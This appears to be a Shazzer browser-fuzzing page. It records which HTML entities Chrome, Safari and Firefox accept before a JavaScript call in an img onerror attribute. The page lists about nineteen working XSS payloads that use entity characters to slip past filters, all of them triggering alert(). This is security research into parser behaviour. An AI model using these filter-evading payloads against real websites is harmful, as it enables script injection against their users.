Entities allowed before function calls
19
19
19This vector uses Shazzer's new features to check which entities are allowed before a function call using images. The results are a bit inconsistent yet because I currently wait for page load.
Created by: hackvertor
Created on: Tuesday, July 2, 2024 at 11:22:28 AM
Updated on: Thursday, November 21, 2024 at 10:24:30 AM
Vector type: XSS
Vector charset: UTF-8
Template used:
<img src=data: onerror="$[data1]log('html($[data1])')">Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src=data: onerror=" alert('&puncsp;')"><img src=data: onerror=" alert('&ensp;')"><img src=data: onerror="	alert('&Tab;')"><img src=data: onerror=" alert('&emsp;')"><img src=data: onerror=" alert('&NonBreakingSpace;')"><img src=data: onerror=" alert('&VeryThinSpace;')"><img src=data: onerror=" alert('&ThinSpace;')"><img src=data: onerror=" alert('&emsp13;')"><img src=data: onerror="  alert('&ThickSpace;')"><img src=data: onerror="+alert('&plus;')"><img src=data: onerror=";alert('&semi;')"><img src=data: onerror=" alert('&nbsp;')"><img src=data: onerror="
alert('&NewLine;')"><img src=data: onerror=" alert('&emsp14;')"><img src=data: onerror="!alert('&excl;')"><img src=data: onerror=" alert('&hairsp;')"><img src=data: onerror=" alert('&numsp;')"><img src=data: onerror=" alert('&thinsp;')"><img src=data: onerror=" alert('&MediumSpace;')">Fuzz results
Chrome 126.0.0.0 desktop macOS 10.15.7
Updated
Tue Jul 02 2024
Found 19 results
Loading...
Safari 18.0 desktop macOS 10.15.7
Updated
Tue Jul 02 2024
Found 19 results
Loading...
Firefox 127.0 desktop macOS 10.15
Updated
Tue Jul 02 2024
Found 19 results
Loading...